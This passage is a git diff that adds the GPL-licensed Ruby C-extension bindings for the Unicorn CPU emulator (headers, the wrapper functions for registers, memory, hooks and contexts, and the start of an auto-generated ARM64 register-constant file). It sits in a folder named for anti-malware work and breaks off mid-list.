a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/types.h b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/types.h new file mode 100644 index 0000000..15da7c8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/types.h @@ -0,0 +1,33 @@ +/* + +Ruby bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Sascha Schirra + +This program is free software; you can redistribute 
it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +typedef struct uc_x86_float80 { + uint64_t mantissa; + uint16_t exponent; +} uc_x86_float80; + + +struct hook { + uc_hook trace; + VALUE cb; + VALUE ud; + VALUE rUc; +}; diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.c new file mode 100644 index 0000000..bb7363f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.c @@ -0,0 +1,589 @@ +/* + +Ruby bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Sascha Schirra + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ +#include "ruby.h" +#include <unicorn/unicorn.h> +#include <unicorn/x86.h> +#include "unicorn.h" +#include "types.h" + +VALUE UnicornModule = Qnil; +VALUE UcClass = Qnil; +VALUE UcError = Qnil; +VALUE SavedContext = Qnil; +VALUE Hook = Qnil; + + +void Init_unicorn_engine() { + rb_require("unicorn_engine/unicorn_const"); + UnicornModule = rb_define_module("UnicornEngine"); + UcError = rb_define_class_under(UnicornModule, "UcError", rb_eStandardError); + SavedContext = rb_define_class_under(UnicornModule, "SavedContext", rb_cObject); + Hook = rb_define_class_under(UnicornModule, "Hook", rb_cObject); + + UcClass = rb_define_class_under(UnicornModule, "Uc", rb_cObject); + rb_define_method(UcClass, "initialize", m_uc_initialize, 2); + rb_define_method(UcClass, "emu_start", m_uc_emu_start, -1); + rb_define_method(UcClass, "emu_stop", m_uc_emu_stop, 0); + rb_define_method(UcClass, "reg_read", m_uc_reg_read, 1); + rb_define_method(UcClass, "reg_write", m_uc_reg_write, 2); + rb_define_method(UcClass, "mem_read", m_uc_mem_read, 2); + rb_define_method(UcClass, "mem_write", m_uc_mem_write, 2); + rb_define_method(UcClass, "mem_map", m_uc_mem_map, -1); + rb_define_method(UcClass, "mem_unmap", m_uc_mem_unmap, 2); + rb_define_method(UcClass, "mem_protect", m_uc_mem_protect, 3); + rb_define_method(UcClass, "hook_add", m_uc_hook_add, -1); + rb_define_method(UcClass, "hook_del", m_uc_hook_del, 1); + rb_define_method(UcClass, "query", m_uc_query, 1); + rb_define_method(UcClass, "context_save", m_uc_context_save, 0); + rb_define_method(UcClass, "context_update", m_uc_context_update, 1); + rb_define_method(UcClass, "context_restore", m_uc_context_restore, 1); +} + +VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode) { + uc_engine *_uc; + uc_err err; + err = uc_open(NUM2INT(arch), NUM2INT(mode), &_uc); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + VALUE uc = Data_Wrap_Struct(UcClass, 0, uc_close, _uc); + rb_iv_set(self, "@uch", uc); + 
rb_iv_set(self, "@hooks", rb_ary_new()); + + return self; +} + +VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self){ + VALUE begin; + VALUE until; + VALUE timeout; + VALUE count; + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + rb_scan_args(argc, argv, "22",&begin, &until, &timeout, &count); + if (NIL_P(timeout)) + timeout = INT2NUM(0); + + if (NIL_P(count)) + count = INT2NUM(0); + + err = uc_emu_start(_uc, NUM2ULL(begin), NUM2ULL(until), NUM2INT(timeout), NUM2INT(count)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_emu_stop(VALUE self){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + err = uc_emu_stop(_uc); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_reg_read(VALUE self, VALUE reg_id){ + uc_err err; + int32_t tmp_reg = NUM2INT(reg_id); + int64_t reg_value = 0; + VALUE to_ret; + uc_x86_mmr mmr; + uc_x86_float80 float80; + + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_arch arch; + uc_query(_uc, UC_QUERY_ARCH, &arch); + + if(arch == UC_ARCH_X86) { + switch(tmp_reg){ + case UC_X86_REG_GDTR: + case UC_X86_REG_IDTR: + case UC_X86_REG_LDTR: + case UC_X86_REG_TR: + mmr.selector = 0; + mmr.base = 0; + mmr.limit = 0; + mmr.flags = 0; + err = uc_reg_read(_uc, tmp_reg, &mmr); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + VALUE mmr_ary = rb_ary_new(); + reg_value = mmr.selector; + rb_ary_store(mmr_ary, 0, UINT2NUM(reg_value)); + rb_ary_store(mmr_ary, 1, ULL2NUM(mmr.base)); + rb_ary_store(mmr_ary, 2, UINT2NUM(mmr.limit)); + rb_ary_store(mmr_ary, 3, UINT2NUM(mmr.flags)); + return mmr_ary; + + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + float80.mantissa 
= 0; + float80.exponent = 0; + + err = uc_reg_read(_uc, tmp_reg, &float80); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + VALUE float80_ary = rb_ary_new(); + + rb_ary_store(float80_ary, 0, ULL2NUM(float80.mantissa)); + rb_ary_store(float80_ary, 1, UINT2NUM(float80.exponent)); + + return float80_ary; + } + } + if(arch == UC_ARCH_ARM64) { + // V & Q registers are the same + if(tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) { + tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if(tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) { + uint64_t neon128_value[2]; + err = uc_reg_read(_uc, tmp_reg, &neon128_value); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + VALUE float128_ary = rb_ary_new(); + rb_ary_store(float128_ary, 0, ULL2NUM(neon128_value[0])); + rb_ary_store(float128_ary, 1, ULL2NUM(neon128_value[1])); + return float128_ary; + } + } + err = uc_reg_read(_uc, tmp_reg, ®_value); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return ULL2NUM(reg_value); +} + +VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value){ + uc_err err; + int32_t tmp_reg = NUM2INT(reg_id); + uc_x86_mmr mmr; + uc_x86_float80 float80; + int64_t tmp; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_arch arch; + uc_query(_uc, UC_QUERY_ARCH, &arch); + + if(arch == UC_ARCH_X86) { + switch(tmp_reg){ + case UC_X86_REG_GDTR: + case UC_X86_REG_IDTR: + case UC_X86_REG_LDTR: + case UC_X86_REG_TR: + Check_Type(reg_value, T_ARRAY); + + mmr.selector = NUM2USHORT(rb_ary_entry(reg_value,0)); + mmr.base = NUM2ULL(rb_ary_entry(reg_value,1)); + mmr.limit = NUM2UINT(rb_ary_entry(reg_value,2)); + mmr.flags = NUM2UINT(rb_ary_entry(reg_value,3)); + err = uc_reg_write(_uc, tmp_reg, &mmr); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; + + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case 
UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + Check_Type(reg_value, T_ARRAY); + + float80.mantissa = NUM2ULL(rb_ary_entry(reg_value,0)); + float80.exponent = NUM2USHORT(rb_ary_entry(reg_value,1)); + + err = uc_reg_write(_uc, tmp_reg, &float80); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + return Qnil; + } + } + if(arch == UC_ARCH_ARM64) { + // V & Q registers are the same + if(tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) { + tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if(tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) { + Check_Type(reg_value, T_ARRAY); + + uint64_t neon128_value[2]; + neon128_value[0] = NUM2ULL(rb_ary_entry(reg_value, 0)); + neon128_value[1] = NUM2ULL(rb_ary_entry(reg_value, 1)); + err = uc_reg_write(_uc, NUM2INT(reg_id), &neon128_value); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; + } + } + + tmp = NUM2ULL(reg_value); + err = uc_reg_write(_uc, NUM2INT(reg_id), &tmp); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size){ + size_t isize = NUM2UINT(size); + uint8_t bytes[isize]; + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + err = uc_mem_read(_uc, NUM2ULL(address), &bytes, isize); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return rb_str_new(bytes, isize); +} + +VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + err = uc_mem_write(_uc, NUM2ULL(address), StringValuePtr(bytes), RSTRING_LEN(bytes)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_map(int argc, VALUE* argv, VALUE self){ + uc_err err; + VALUE address; + VALUE size; + 
VALUE perms; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + rb_scan_args(argc, argv, "21",&address, &size, &perms); + if (NIL_P(perms)) + perms = INT2NUM(UC_PROT_ALL); + + err = uc_mem_map(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc); + err = uc_mem_unmap(_uc, NUM2ULL(address), NUM2UINT(size)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + err = uc_mem_protect(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +static void cb_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 4, rUc, ULL2NUM(address), UINT2NUM(size), ud); +} + +static void cb_hook_mem_access(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud); +} + +static bool cb_hook_mem_invalid(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = 
hook->rUc; + + return RTEST(rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud)); +} + +static uint32_t cb_hook_insn_in(uc_engine *uc, uint32_t port, int size, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + return NUM2UINT(rb_funcall(cb, rb_intern("call"), 4, rUc, UINT2NUM(port), INT2NUM(size), ud)); +} + +static void cb_hook_insn_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 5, rUc, UINT2NUM(port), INT2NUM(size), UINT2NUM(value), ud); +} + +static void cb_hook_insn_syscall(uc_engine *uc, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 2, rUc, ud); +} + +static void cb_hook_intr(uc_engine *uc, uint32_t intno, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 3, rUc, ULL2NUM(intno), ud); +} + +static void mark_hook(void *p){ + struct hook *hook = (struct hook *)p; + rb_gc_mark(hook->cb); + rb_gc_mark(hook->ud); + rb_gc_mark(hook->rUc); // just for completeness sake even though this should already be marked +} + +VALUE m_uc_hook_add(int argc, VALUE* argv, VALUE self){ + VALUE hook_type; + VALUE callback; + VALUE user_data; + VALUE begin; + VALUE end; + VALUE arg1; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc); + + rb_scan_args(argc, argv, "24",&hook_type, &callback, &user_data, &begin, &end, &arg1); + if (NIL_P(begin)) + begin = ULL2NUM(1); + + if (NIL_P(end)) + end = 
ULL2NUM(0); + + if (NIL_P(arg1)) + arg1 = INT2NUM(0); + + uc_err err; + + if (rb_class_of(callback) != rb_cProc) + rb_raise(UcError, "Expected Proc callback"); + + struct hook *hook = (struct hook *)malloc(sizeof(struct hook)); + hook->cb = callback; + hook->ud = user_data; + hook->rUc = self; + VALUE r_hook; + VALUE hooks_list; + r_hook = Data_Wrap_Struct(Hook, mark_hook, free, hook); + hooks_list = rb_iv_get(self, "@hooks"); + rb_ary_push(hooks_list, r_hook); + + uint32_t htype = NUM2UINT(hook_type); + if(htype == UC_HOOK_INSN){ + switch(NUM2INT(arg1)){ + case UC_X86_INS_IN: + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_in,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); + break; + case UC_X86_INS_OUT: + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_out,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); + break; + case UC_X86_INS_SYSCALL: + case UC_X86_INS_SYSENTER: + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_syscall,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); + break; + } + } + else if(htype == UC_HOOK_INTR){ + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_intr,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + else if(htype == UC_HOOK_CODE || htype == UC_HOOK_BLOCK){ + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_code,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + else if (htype & UC_HOOK_MEM_READ_UNMAPPED + || htype & UC_HOOK_MEM_WRITE_UNMAPPED + || htype & UC_HOOK_MEM_FETCH_UNMAPPED + || htype & UC_HOOK_MEM_READ_PROT + || htype & UC_HOOK_MEM_WRITE_PROT + || htype & UC_HOOK_MEM_FETCH_PROT + || htype & UC_HOOK_MEM_READ_INVALID + || htype & UC_HOOK_MEM_WRITE_INVALID + || htype & UC_HOOK_MEM_FETCH_INVALID + || htype & UC_HOOK_MEM_UNMAPPED + || htype & UC_HOOK_MEM_PROT + || htype & UC_HOOK_MEM_INVALID) { + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_invalid,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + else{ + err = uc_hook_add(_uc, &hook->trace, htype, 
cb_hook_mem_access,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return r_hook; +} + +VALUE m_uc_hook_del(VALUE self, VALUE hook){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + struct hook *h; + Data_Get_Struct(hook, struct hook, h); + err = uc_hook_del(_uc, h->trace); + + rb_ary_delete(rb_iv_get(self, "@hooks"), hook); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_query(VALUE self, VALUE query_mode){ + int qm = NUM2INT(query_mode); + size_t result; + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + err = uc_query(_uc, qm, &result); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return INT2NUM(result); +} + +VALUE m_uc_context_save(VALUE self){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_context *_context; + err = uc_context_alloc(_uc, &_context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + err = uc_context_save(_uc, _context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + VALUE sc = Data_Wrap_Struct(SavedContext, 0, uc_free, _context); + return sc; +} + +VALUE m_uc_context_update(VALUE self, VALUE context){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_context *_context; + Data_Get_Struct(context, uc_context, _context); + + err = uc_context_save(_uc, _context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_context_restore(VALUE self, VALUE context){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_context *_context; + Data_Get_Struct(context, uc_context, _context); + + err = uc_context_restore(_uc, _context); + if (err != 
UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.h new file mode 100644 index 0000000..a6cd09a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.h @@ -0,0 +1,36 @@ +/* + +Ruby bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Sascha Schirra + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ +VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode); +VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self); +VALUE m_uc_emu_stop(VALUE self); +VALUE m_uc_reg_read(VALUE self, VALUE reg_id); +VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value); +VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size); +VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes); +VALUE m_uc_mem_map(int argc, VALUE* argv, VALUE self); +VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size); +VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms); +VALUE m_uc_hook_add(int argc, VALUE* argv, VALUE self); +VALUE m_uc_hook_del(VALUE self, VALUE hook); +VALUE m_uc_query(VALUE self, VALUE query_mode); +VALUE m_uc_context_save(VALUE self); +VALUE m_uc_context_update(VALUE self, VALUE context); +VALUE m_uc_context_restore(VALUE self, VALUE context); diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb new file mode 100644 index 0000000..4c98dd0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb @@ -0,0 +1,314 @@ +# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.rb] + +module UnicornEngine + +# ARM64 registers + + UC_ARM64_REG_INVALID = 0 + UC_ARM64_REG_X29 = 1 + UC_ARM64_REG_X30 = 2 + UC_ARM64_REG_NZCV = 3 + UC_ARM64_REG_SP = 4 + UC_ARM64_REG_WSP = 5 + UC_ARM64_REG_WZR = 6 + UC_ARM64_REG_XZR = 7 + UC_ARM64_REG_B0 = 8 + UC_ARM64_REG_B1 = 9 + UC_ARM64_REG_B2 = 10 + UC_ARM64_REG_B3 = 11 + UC_ARM64_REG_B4 = 12 + UC_ARM64_REG_B5 = 13 + UC_ARM64_REG_B6 = 14 + UC_ARM64_REG_B7 = 15 + UC_ARM64_REG_B8 = 16 + UC_ARM64_REG_B9 = 17 + UC_ARM64_REG_B10 = 18 + UC_ARM64_REG_B11 = 19 + UC_ARM64_REG_B12 = 20 + UC_ARM64_REG_B13 = 21 + UC_ARM64_REG_B14 = 22 + UC_ARM64_REG_B15 = 23 + UC_ARM64_REG_B16 = 24 + UC_ARM64_REG_B17 = 25 + UC_ARM64_REG_B18 = 26 + UC_ARM64_REG_B19 = 27 + UC_ARM64_REG_B20 = 28 + UC_ARM64_REG_B21 = 29 + UC_ARM64_REG_B22 = 30 + UC_ARM64_REG_B23 = 31 + UC_ARM64_REG_B24 = 32 + UC_ARM64_REG_B25 = 33 + UC_ARM64_REG_B26 = 34 + UC_ARM64_REG_B27 = 35 + UC_ARM64_REG_B28 = 36 + UC_ARM64_REG_B29 = 37 + UC_ARM64_REG_B30 = 38 + UC_ARM64_REG_B31 = 39 + UC_ARM64_REG_D0 = 40 + UC_ARM64_REG_D1 = 41 + UC_ARM64_REG_D2 = 42 + UC_ARM64_REG_D3 = 43 + UC_ARM64_REG_D4 = 44 + UC_ARM64_REG_D5 = 45 + UC_ARM64_REG_D6 = 46 + UC_ARM64_REG_D7 = 47 + UC_ARM64_REG_D8 = 48 + UC_ARM64_REG_D9 = 49 + UC_ARM64_REG_D10 = 50 + UC_ARM64_REG_D11 = 51 + UC_ARM64_REG_D12 = 52 + UC_ARM64_REG_D13 = 53 + UC_ARM64_REG_D14 = 54 + UC_ARM64_REG_D15 = 55 + UC_ARM64_REG_D16 = 56 + UC_ARM64_REG_D17 = 57 + UC_ARM64_REG_D18 = 58 + UC_ARM64_REG_D19 = 59 + UC_ARM64_REG_D20 = 60 + UC_ARM64_REG_D21 = 61 + UC_ARM64_REG_D22 = 62 + UC_ARM64_REG_D23 = 63 + UC_ARM64_REG_D24 = 64 + UC_ARM64_REG_D25 = 65 + UC_ARM64_REG_D26 = 66 + UC_ARM64_REG_D27 = 67 + UC_ARM64_REG_D28 = 68 + UC_ARM64_REG_D29 = 69 + UC_ARM64_REG_D30 = 70 + UC_ARM64_REG_D31 = 71 + UC_ARM64_REG_H0 = 72 + UC_ARM64_REG_H1 = 73 + UC_ARM64_REG_H2 = 74 + UC_ARM64_REG_H3 = 75 + UC_ARM64_REG_H4 = 76 + UC_ARM64_REG_H5 = 77 + UC_ARM64_REG_H6 = 78 + UC_ARM64_REG_H7 = 79 + 
UC_ARM64_REG_H8 = 80 + UC_ARM64_REG_H9 = 81 + UC_ARM64_REG_H10 = 82 + UC_ARM64_REG_H11 = 83 + UC_ARM64_REG_H12 = 84 + UC_ARM64_REG_H13 = 85 + UC_ARM64_REG_H14 = 86 + UC_ARM64_REG_H15 = 87 + UC_ARM64_REG_H16 = 88 + UC_ARM64_REG_H17 = 89 + UC_ARM64_REG_H18 = 90 + UC_ARM64_REG_H19 = 91 + UC_ARM64_REG_H20 = 92 + UC_ARM64_REG_H21 = 93 + UC_ARM64_REG_H22 = 94 + UC_ARM64_REG_H23 = 95 + UC_ARM64_REG_H24 = 96 + UC_ARM64_REG_H25 = 97 + UC_ARM64_REG_H26 = 98 + UC_ARM64_REG_H27 = 99 + UC_ARM64_REG_H28 = 100 + UC_ARM64_REG_H29 = 101 + UC_ARM64_REG_H30 = 102 + UC_ARM64_REG_H31 = 103 + UC_ARM64_REG_Q0 = 104 + UC_ARM64_REG_Q1 = 105 + UC_ARM64_REG_Q2 = 106 + UC_ARM64_REG_Q3 = 107 + UC_ARM64_REG_Q4 = 108 + UC_ARM64_REG_Q5 = 109 + UC_ARM64_REG_Q6 = 110 + UC_ARM64_REG_Q7 = 111 + UC_ARM64_REG_Q8 = 112 + UC_ARM64_REG_Q9 = 113 + UC_ARM64_REG_Q10 = 114 + UC_ARM64_REG_Q11 = 115 + UC_ARM64_REG_Q12 = 116 + UC_ARM64_REG_Q13 = 117 + UC_ARM64_REG_Q14 = 118 + UC_ARM64_REG_Q15 = 119 + UC_ARM64_REG_Q16 = 120 + UC_ARM64_REG_Q17 = 121 + UC_ARM64_REG_Q18 = 122 + UC_ARM64_REG_Q19 = 123 + UC_ARM64_REG_Q20 = 124 + UC_ARM64_REG_Q21 = 125 + UC_ARM64_REG_Q22 = 126 + UC_ARM64_REG_Q23 = 127 + UC_ARM64_REG_Q24 = 128 + UC_ARM64_REG_Q25 = 129 + UC_ARM64_REG_Q26 = 130 + UC_ARM64_REG_Q27 = 131 + UC_ARM64_REG_Q28 = 132 + UC_ARM64_REG_Q29 = 133 + UC_ARM64_REG_Q30 = 134 + UC_ARM64_REG_Q31 = 135 + UC_ARM64_REG_S0 = 136 + UC_ARM64_REG_S1 = 137 + UC_ARM64_REG_S2 = 138 + UC_ARM64_REG_S3 = 139 + UC_ARM64_REG_S4 = 140 + UC_ARM64_REG_S5 = 141 + UC_ARM64_REG_S6 = 142 + UC_ARM64_REG_S7 = 143 + UC_ARM64_REG_S8 = 144 + UC_ARM64_REG_S9 = 145 + UC_ARM64_REG_S10 = 146 + UC_ARM64_REG_S11 = 147 + UC_ARM64_REG_S12 = 148 + UC_ARM64_REG_S13 = 149 + UC_ARM64_REG_S14 = 150 + UC_ARM64_REG_S15 = 151 + UC_ARM64_REG_S16 = 152 + UC_ARM64_REG_S17 = 153 + UC_ARM64_REG_S18 = 154 + UC_ARM64_REG_S19 = 155 + UC_ARM64_REG_S20 = 156 + UC_ARM64_REG_S21 = 157 + UC_ARM64_REG_S22 = 158 + UC_ARM64_REG_S23 = 159 + UC_ARM64_REG_S24 = 160 + UC_ARM64_REG_S25 
